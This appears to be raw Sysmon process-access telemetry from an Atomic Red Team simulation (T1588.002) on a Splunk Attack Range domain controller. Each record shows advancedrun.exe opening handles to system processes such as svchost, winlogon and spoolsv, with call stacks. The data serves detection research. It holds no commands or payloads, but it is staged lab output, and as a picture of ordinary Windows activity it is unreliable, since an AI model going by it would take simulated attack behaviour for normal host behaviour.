17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983949Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983948Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983947Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983946Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983945Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983944Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983943Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983942Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983941Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983940Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983939Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983938Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983937Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983936Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003983935Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983934Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983933Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
